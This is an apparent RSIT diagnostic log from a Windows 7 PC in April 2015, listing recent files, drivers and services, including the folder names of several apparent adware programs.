"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"VIDC.LAGS"=lagarith.dll
"VIDC.X264"=x264vfw64.dll
"VIDC.XVID"=xvidvfw.dll
"VIDC.FFDS"=ff_vfw.dll
"msacm.ac3acm"=ac3acm.acm
"msacm.l3codecp"=l3codecp.acm

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 month======

2015-04-19 08:51:46 ----D---- C:\Program Files\trend micro
2015-04-19 08:51:45 ----D---- C:\rsit
2015-04-15 18:10:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerInstaller.exe
2015-04-14 23:15:43 ----SHD---- C:\Config.Msi
2015-04-14 23:10:43 ----A---- C:\Windows\SYSWOW64\ntdll.dll
2015-04-14 23:10:43 ----A---- C:\Windows\system32\ntoskrnl.exe
2015-04-14 23:10:43 ----A---- C:\Windows\system32\ntdll.dll
2015-04-14 23:10:43 ----A---- C:\Windows\system32\KernelBase.dll
2015-04-14 23:10:43 ----A---- C:\Windows\system32\kernel32.dll
2015-04-14 23:10:42 ----A---- C:\Windows\SYSWOW64\ntoskrnl.exe
2015-04-14 23:10:42 ----A---- C:\Windows\SYSWOW64\ntkrnlpa.exe
2015-04-14 23:10:42 ----A---- C:\Windows\SYSWOW64\kernel32.dll
2015-04-14 23:10:42 ----A---- C:\Windows\system32\wow64win.dll
2015-04-14 23:10:42 ----A---- C:\Windows\system32\schannel.dll
2015-04-14 23:10:42 ----A---- C:\Windows\system32\lsasrv.dll
2015-04-14 23:10:41 ----A---- C:\Windows\SYSWOW64\TSpkg.dll
2015-04-14 23:10:41 ----A---- C:\Windows\SYSWOW64\schannel.dll
2015-04-14 23:10:41 ----A---- C:\Windows\SYSWOW64\ncrypt.dll
2015-04-14 23:10:41 ----A---- C:\Windows\SYSWOW64\msv1_0.dll
2015-04-14 23:10:41 ----A---- C:\Windows\SYSWOW64\kerberos.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\wow64.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\winsrv.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\wdigest.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\TSpkg.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\sspicli.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\srcore.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\smss.exe
2015-04-14 23:10:41 ----A---- C:\Windows\system32\rstrui.exe
2015-04-14 23:10:41 ----A---- C:\Windows\system32\ncrypt.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\msv1_0.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\kerberos.dll
2015-04-14 23:10:41 ----A---- C:\Windows\system32\drivers\ksecpkg.sys
2015-04-14 23:10:41 ----A---- C:\Windows\system32\drivers\ksecdd.sys
2015-04-14 23:10:41 ----A---- C:\Windows\system32\conhost.exe
2015-04-14 23:10:40 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-string-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-file-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-04-14 23:10:40 ----AH---- C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\wow32.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\wdigest.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\sspicli.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\srclient.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\setup16.exe
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\secur32.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\ntvdm64.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\KernelBase.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\credssp.dll
2015-04-14 23:10:40 ----A---- C:\Windows\SYSWOW64\auditpol.exe
2015-04-14 23:10:40 ----A---- C:\Windows\system32\wow64cpu.dll
2015-04-14 23:10:40 ----A---- C:\Windows\system32\sspisrv.dll
2015-04-14 23:10:40 ----A---- C:\Windows\system32\srclient.dll
2015-04-14 23:10:40 ----A---- C:\Windows\system32\secur32.dll
2015-04-14 23:10:40 ----A---- C:\Windows\system32\ntvdm64.dll
2015-04-14 23:10:40 ----A---- C:\Windows\system32\lsass.exe
2015-04-14 23:10:40 ----A---- C:\Windows\system32\csrsrv.dll
2015-04-14 23:10:40 ----A---- C:\Windows\system32\credssp.dll
2015-04-14 23:10:40 ----A---- C:\Windows\system32\auditpol.exe
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-security-base-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-util-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-io-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\SYSWOW64\api-ms-win-core-console-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-04-14 23:10:39 ----AH---- C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-04-14 23:10:39 ----A---- C:\Windows\SYSWOW64\instnm.exe
2015-04-14 23:10:38 ----A---- C:\Windows\SYSWOW64\user.exe
2015-04-14 23:10:38 ----A---- C:\Windows\SYSWOW64\msobjs.dll
2015-04-14 23:10:38 ----A---- C:\Windows\SYSWOW64\msaudite.dll
2015-04-14 23:10:38 ----A---- C:\Windows\SYSWOW64\apisetschema.dll
2015-04-14 23:10:38 ----A---- C:\Windows\SYSWOW64\adtschema.dll
2015-04-14 23:10:38 ----A---- C:\Windows\system32\msobjs.dll
2015-04-14 23:10:38 ----A---- C:\Windows\system32\msaudite.dll
2015-04-14 23:10:38 ----A---- C:\Windows\system32\apisetschema.dll
2015-04-14 23:10:38 ----A---- C:\Windows\system32\adtschema.dll
2015-04-14 23:10:32 ----A---- C:\Windows\SYSWOW64\wuwebv.dll
2015-04-14 23:10:32 ----A---- C:\Windows\SYSWOW64\wups.dll
2015-04-14 23:10:32 ----A---- C:\Windows\SYSWOW64\wudriver.dll
2015-04-14 23:10:32 ----A---- C:\Windows\SYSWOW64\wuapp.exe
2015-04-14 23:10:32 ----A---- C:\Windows\system32\wuapp.exe
2015-04-14 23:10:31 ----A---- C:\Windows\SYSWOW64\wuapi.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wuwebv.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wups2.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wups.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wudriver.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wucltux.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wuaueng.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wuauclt.exe
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wuapi.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\wu.upgrade.ps.dll
2015-04-14 23:10:31 ----A---- C:\Windows\system32\WinSetupUI.dll
2015-04-14 23:10:20 ----A---- C:\Windows\SYSWOW64\mshtmled.dll
2015-04-14 23:10:20 ----A---- C:\Windows\SYSWOW64\iernonce.dll
2015-04-14 23:10:20 ----A---- C:\Windows\SYSWOW64\ieetwproxystub.dll
2015-04-14 23:10:20 ----A---- C:\Windows\system32\ieetwproxystub.dll
2015-04-14 23:10:20 ----A---- C:\Windows\system32\ieetwcollector.exe
2015-04-14 23:10:19 ----A---- C:\Windows\SYSWOW64\MshtmlDac.dll
2015-04-14 23:10:19 ----A---- C:\Windows\system32\ie4uinit.exe
2015-04-14 23:10:18 ----A---- C:\Windows\SYSWOW64\urlmon.dll
2015-04-14 23:10:18 ----A---- C:\Windows\SYSWOW64\mshtml.dll
2015-04-14 23:10:18 ----A---- C:\Windows\SYSWOW64\msfeeds.dll
2015-04-14 23:10:18 ----A---- C:\Windows\SYSWOW64\JavaScriptCollectionAgent.dll
2015-04-14 23:10:18 ----A---- C:\Windows\SYSWOW64\iedkcs32.dll
2015-04-14 23:10:18 ----A---- C:\Windows\SYSWOW64\dxtrans.dll
2015-04-14 23:10:18 ----A---- C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-04-14 23:10:18 ----A---- C:\Windows\system32\iernonce.dll
2015-04-14 23:10:17 ----A---- C:\Windows\SYSWOW64\iesetup.dll
2015-04-14 23:10:17 ----A---- C:\Windows\SYSWOW64\ieapfltr.dll
2015-04-14 23:10:17 ----A---- C:\Windows\system32\iedkcs32.dll
2015-04-14 23:10:16 ----A---- C:\Windows\SYSWOW64\jsproxy.dll
2015-04-14 23:10:16 ----A---- C:\Windows\SYSWOW64\jscript9diag.dll
2015-04-14 23:10:16 ----A---- C:\Windows\SYSWOW64\ieUnatt.exe
2015-04-14 23:10:16 ----A---- C:\Windows\SYSWOW64\ieui.dll
2015-04-14 23:10:16 ----A---- C:\Windows\SYSWOW64\iertutil.dll
2015-04-14 23:10:16 ----A---- C:\Windows\SYSWOW64\dxtmsft.dll
2015-04-14 23:10:16 ----A---- C:\Windows\system32\urlmon.dll
2015-04-14 23:10:16 ----A---- C:\Windows\system32\MsSpellCheckingFacility.exe
2015-04-14 23:10:16 ----A---- C:\Windows\system32\msfeeds.dll
2015-04-14 23:10:16 ----A---- C:\Windows\system32\ieetwcollectorres.dll
2015-04-14 23:10:16 ----A---- C:\Windows\system32\dxtrans.dll
2015-04-14 23:10:15 ----A---- C:\Windows\SYSWOW64\ieframe.dll
2015-04-14 23:10:15 ----A---- C:\Windows\system32\iesetup.dll
2015-04-14 23:10:15 ----A---- C:\Windows\system32\ieapfltr.dll
2015-04-14 23:10:14 ----A---- C:\Windows\SYSWOW64\wininet.dll
2015-04-14 23:10:14 ----A---- C:\Windows\SYSWOW64\vbscript.dll
2015-04-14 23:10:14 ----A---- C:\Windows\SYSWOW64\mshtmlmedia.dll
2015-04-14 23:10:14 ----A---- C:\Windows\SYSWOW64\jscript9.dll
2015-04-14 23:10:14 ----A---- C:\Windows\system32\jsproxy.dll
2015-04-14 23:10:14 ----A---- C:\Windows\system32\iertutil.dll
2015-04-14 23:10:13 ----A---- C:\Windows\SYSWOW64\msrating.dll
2015-04-14 23:10:13 ----A---- C:\Windows\system32\ieUnatt.exe
2015-04-14 23:10:13 ----A---- C:\Windows\system32\ieui.dll
2015-04-14 23:10:13 ----A---- C:\Windows\system32\ieframe.dll
2015-04-14 23:10:13 ----A---- C:\Windows\system32\dxtmsft.dll
2015-04-14 23:10:12 ----A---- C:\Windows\system32\vbscript.dll
2015-04-14 23:10:12 ----A---- C:\Windows\system32\mshtmlmedia.dll
2015-04-14 23:10:12 ----A---- C:\Windows\system32\mshtmled.dll
2015-04-14 23:10:12 ----A---- C:\Windows\system32\jscript9diag.dll
2015-04-14 23:10:12 ----A---- C:\Windows\system32\jscript9.dll
2015-04-14 23:10:11 ----A---- C:\Windows\system32\wininet.dll
2015-04-14 23:10:11 ----A---- C:\Windows\system32\msrating.dll
2015-04-14 23:10:11 ----A---- C:\Windows\system32\MshtmlDac.dll
2015-04-14 23:10:10 ----A---- C:\Windows\system32\mshtml.dll
2015-04-14 23:10:08 ----A---- C:\Windows\system32\drivers\http.sys
2015-04-14 23:10:07 ----A---- C:\Windows\SYSWOW64\msxml3r.dll
2015-04-14 23:10:07 ----A---- C:\Windows\SYSWOW64\msxml3.dll
2015-04-14 23:10:07 ----A---- C:\Windows\system32\msxml3r.dll
2015-04-14 23:10:07 ----A---- C:\Windows\system32\msxml3.dll
2015-04-14 23:09:54 ----A---- C:\Windows\SYSWOW64\gdi32.dll
2015-04-14 23:09:54 ----A---- C:\Windows\system32\gdi32.dll
2015-04-14 23:06:26 ----A---- C:\Windows\system32\clfs.sys
2015-04-14 23:06:25 ----A---- C:\Windows\SYSWOW64\clfsw32.dll
2015-04-14 23:06:25 ----A---- C:\Windows\system32\clfsw32.dll
2015-04-14 16:05:44 ----D---- C:\Program Files (x86)\ead1d464-3c89-4c86-80ea-78f66b58bffd
2015-04-14 16:01:05 ----A---- C:\Windows\system32\drivers\{6507715a-2a05-421f-9b74-91bfdc9da8ad}Gw64.sys
2015-04-14 15:59:44 ----D---- C:\Program Files (x86)\globalUpdate
2015-04-14 15:59:44 ----D---- C:\Program Files (x86)\aad30ca0-2856-4784-822d-3c50a2865bd0
2015-04-14 15:59:21 ----D---- C:\Program Files (x86)\Ttessab
2015-04-14 15:58:52 ----D---- C:\Users\Amd\AppData\Roaming\SONY RDR-HX970 user guide
2015-04-14 15:57:04 ----D---- C:\Users\Amd\AppData\Roaming\QuickScan
2015-04-14 15:54:52 ----D---- C:\Program Files (x86)\Seznam.cz
2015-04-14 15:54:39 ----D---- C:\Users\Amd\AppData\Roaming\Seznam.cz
2015-04-14 15:54:37 ----D---- C:\Users\Amd\AppData\Roaming\SONY RDR-HXD 790 user guide
2015-04-11 11:05:14 ----D---- C:\Users\Amd\AppData\Roaming\.pixelmon
2015-04-11 11:04:12 ----D---- C:\Users\Amd\AppData\Roaming\Ikara Software Limited
2015-04-09 07:25:35 ----D---- C:\Program Files (x86)\DownnSaeve
2015-04-07 18:07:21 ----D---- C:\Program Files (x86)\Mozilla Firefox
2015-04-03 16:10:49 ----D---- C:\Program Files (x86)\SaaveeNewaAppz
2015-03-29 00:42:46 ----D---- C:\Program Files (x86)\Hide ALL IP 2014
2015-03-25 11:54:35 ----D---- C:\ProgramData\Caphyon
2015-03-25 11:54:29 ----D---- C:\Program Files (x86)\Mojang
2015-03-25 11:54:29 ----D---- C:\Program Files (x86)\Adobe Arkalis
2015-03-25 11:53:34 ----D---- C:\Users\Amd\AppData\Roaming\Mojang
2015-03-24 08:18:13 ----D---- C:\Users\Amd\AppData\Roaming\java
2015-03-24 08:16:24 ----D---- C:\ProgramData\APN
2015-03-20 12:32:56 ----D---- C:\Program Files (x86)\CCouppEEXTaensioN
2015-03-20 12:32:54 ----D---- C:\Program Files (x86)\Facebook Social Plugin
2015-03-20 12:32:25 ----D---- C:\Program Files (x86)\DDownSavE
2015-03-20 12:32:15 ----D---- C:\Program Files (x86)\EExstraCoupoNN

======List of files/folders modified in the last 1 month======

2015-04-19 08:56:13 ----D---- C:\Windows\Prefetch
2015-04-19 08:53:33 ----D---- C:\Windows\Temp
2015-04-19 08:51:46 ----RD---- C:\Program Files
2015-04-19 08:50:01 ----D---- C:\Windows\system32\Tasks
2015-04-19 08:50:00 ----D---- C:\Windows\Tasks
2015-04-18 16:14:43 ----D---- C:\Users\Amd\AppData\Roaming\vlc
2015-04-18 15:55:08 ----D---- C:\Windows\System32
2015-04-18 15:55:08 ----A---- C:\Windows\system32\PerfStringBackup.INI
2015-04-18 15:55:07 ----D---- C:\Windows\inf
2015-04-18 07:04:35 ----SHD---- C:\System Volume Information
2015-04-17 16:38:14 ----D---- C:\Users\Amd\AppData\Roaming\.minecraft
2015-04-17 07:31:02 ----D---- C:\Windows\system32\config
2015-04-17 07:19:29 ----D---- C:\Windows\SoftwareDistribution
2015-04-17 07:18:36 ----D---- C:\Windows\system32\catroot2
2015-04-17 07:18:14 ----D---- C:\Windows\debug
2015-04-17 07:18:11 ----D---- C:\Windows
2015-04-16 12:44:42 ----D---- C:\Windows\rescache
2015-04-16 07:39:21 ----D---- C:\ProgramData\Landi11-original
2015-04-15 18:10:15 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2015-04-15 18:10:03 ----D---- C:\Windows\SysWOW64
2015-04-15 07:55:29 ----D---- C:\Windows\Microsoft.NET
2015-04-15 07:53:11 ----RSD---- C:\Windows\assembly
2015-04-15 00:03:11 ----D---- C:\Users\Amd\AppData\Roaming\DAEMON Tools Lite
2015-04-14 23:38:20 ----D---- C:\Windows\winsxs
2015-04-14 23:36:23 ----D---- C:\Windows\system32\catroot
2015-04-14 23:36:08 ----D---- C:\Windows\SYSWOW64\cs-CZ
2015-04-14 23:36:08 ----D---- C:\Windows\system32\cs-CZ
2015-04-14 23:36:07 ----D---- C:\Windows\SYSWOW64\en-US
2015-04-14 23:36:07 ----D---- C:\Windows\system32\en-US
2015-04-14 23:36:07 ----D---- C:\Windows\system32\drivers
2015-04-14 23:36:07 ----D---- C:\Windows\AppPatch
2015-04-14 23:36:07 ----D---- C:\Program Files\Internet Explorer
2015-04-14 23:36:07 ----D---- C:\Program Files (x86)\Internet Explorer
2015-04-14 23:32:00 ----SHD---- C:\Windows\Installer
2015-04-14 23:31:58 ----D---- C:\ProgramData\Microsoft Help
2015-04-14 23:30:03 ----A---- C:\Windows\SYSWOW64\PerfStringBackup.INI
2015-04-14 23:25:32 ----D---- C:\Windows\system32\MRT
2015-04-14 23:16:20 ----RSD---- C:\Windows\Fonts
2015-04-14 23:15:52 ----D---- C:\Program Files\Microsoft Security Client
2015-04-14 23:15:51 ----D---- C:\Program Files (x86)\Microsoft Security Client
2015-04-14 23:13:54 ----N---- C:\Windows\win.ini
2015-04-14 23:06:47 ----RD---- C:\Program Files (x86)
2015-04-14 16:37:02 ----D---- C:\Windows\system32\wdi
2015-04-14 16:33:32 ----D---- C:\Windows\pss
2015-04-14 16:05:52 ----D---- C:\Program Files (x86)\Adobe
2015-04-10 23:00:50 ----D---- C:\Windows\Minidump
2015-04-09 07:26:24 ----D---- C:\ProgramData\6773128255015385761
2015-04-07 23:33:57 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2015-04-02 00:50:06 ----D---- C:\ProgramData\DAEMON Tools Lite
2015-04-01 17:15:33 ----D---- C:\ProgramData\AlawarWrapper
2015-04-01 11:16:02 ----A---- C:\Windows\system32\MRT.exe
2015-03-29 02:53:59 ----D---- C:\Users\Amd\AppData\Roaming\Winamp
2015-03-27 13:04:11 ----HD---- C:\ProgramData
2015-03-24 08:24:50 ----D---- C:\ProgramData\Oracle
2015-03-24 08:18:33 ----D---- C:\Program Files (x86)\Java
2015-03-24 08:14:22 ----D---- C:\Program Files (x86)\Common Files
2015-03-24 08:13:59 ----A---- C:\Windows\SYSWOW64\WindowsAccessBridge-32.dll
2015-03-21 15:29:19 ----D---- C:\Windows\Logs

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 amd_sata;amd_sata; C:\Windows\system32\DRIVERS\amd_sata.sys [2011-04-15 79488]
R0 amd_xata;amd_xata; C:\Windows\system32\DRIVERS\amd_xata.sys [2011-04-15 40064]
R0 asahci64;asahci64; C:\Windows\system32\DRIVERS\asahci64.sys [2012-07-18 49048]
R0 AtiPcie;AMD PCI Express (3GIO) Filter; C:\Windows\system32\DRIVERS\AtiPcie64.sys [2010-06-17 16440]
R0 MpFilter;Microsoft Malware Protection Driver; C:\Windows\system32\DRIVERS\MpFilter.sys [2014-11-15 274696]
R0 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-20 213888]
R0 vmbus;@%SystemRoot%\system32\vmbusres.dll,-1000; C:\Windows\system32\drivers\vmbus.sys [2010-11-20 199552]
R1 {6507715a-2a05-421f-9b74-91bfdc9da8ad}Gw64;{6507715a-2a05-421f-9b74-91bfdc9da8ad}Gw64; C:\Windows\system32\drivers\{6507715a-2a05-421f-9b74-91bfdc9da8ad}Gw64.sys [2015-04-13 48824]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-20 514560]
R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver; C:\Windows\system32\DRIVERS\dtsoftbus01.sys [2014-11-05 283064]
R2 AODDriver4.1;AODDriver4.1; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [2013-07-31 42240]
R2 cpuz135;cpuz135; \??\C:\Windows\system32\drivers\cpuz135_x64.sys [2011-09-21 21992]
R2 NisDrv;Microsoft Network Inspection System; C:\Windows\system32\DRIVERS\NisDrvWFP.sys [2014-11-15 124560]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-09-12 12760576]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-09-12 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2013-09-24 94208]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys [2013-07-02 3472600]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2013-04-10 849992]
R3 rusb3hub;Renesas Electronics USB 3.0 Hub Driver (Version 3.0); C:\Windows\system32\DRIVERS\rusb3hub.sys [2012-08-27 114568]
R3 rusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver (Version 3.0); C:\Windows\system32\DRIVERS\rusb3xhc.sys [2012-08-27 230280]
R3 usbfilter;AMD USB Filter Driver; C:\Windows\system32\DRIVERS\usbfilter.sys [2010-11-28 44672]
R3 WinRing0_1_2_0;WinRing0_1_2_0; \??\C:\Users\Amd\AppData\Local\Temp\tmp63B1.tmp []
S2 AODDriver4.2.0;AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [2013-07-31 42240]
S3 amdiox64;AMD IO Driver; C:\Windows\system32\DRIVERS\amdiox64.sys [2010-02-18 46136]
S3 androidusb;SAMSUNG Android Composite ADB Interface Driver; C:\Windows\System32\Drivers\ssadadb.sys [2011-05-13 36328]
S3 cpuz137;cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys []
S3 GPUZ;GPUZ; \??\C:\Windows\TEMP\GPUZ.sys []
S3 NTIOLib_1_0_C;NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys []
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-20 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-20 6656]
S3 ssadbus;SAMSUNG Android USB Composite Device driver (WDM); C:\Windows\system32\DRIVERS\ssadbus.sys [2011-05-13 157672]
S3 ssadmdfl;SAMSUNG Android USB Modem (Filter); C:\Windows\system32\DRIVERS\ssadmdfl.sys [2011-05-13 16872]
S3 ssadmdm;SAMSUNG Android USB Modem Drivers; C:\Windows\system32\DRIVERS\ssadmdm.sys [2011-05-13 177640]
S3 ssadserd;SAMSUNG Android USB Diagnostic Serial Port (WDM); C:\Windows\system32\DRIVERS\ssadserd.sys [2011-05-13 146920]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-20 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-20 21760]
S3 WinUsb;WinUsb; C:\Windows\system32\DRIVERS\WinUsb.sys [2010-11-20 41984]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2014-12-19 81088]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-09-12 239616]
R2 AMD FUEL Service;AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2013-09-11 344064]
R2 MsMpSvc;Microsoft Antimalware Service; C:\Program Files\Microsoft Security Client\MsMpEng.exe [2015-01-30 23784]
R3 NisSrv;@C:\Program Files\Microsoft Security Client\MpAsDesc.dll,-243; C:\Program Files\Microsoft Security Client\NisSrv.exe [2015-01-30 366512]
R3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-09-11 105144]
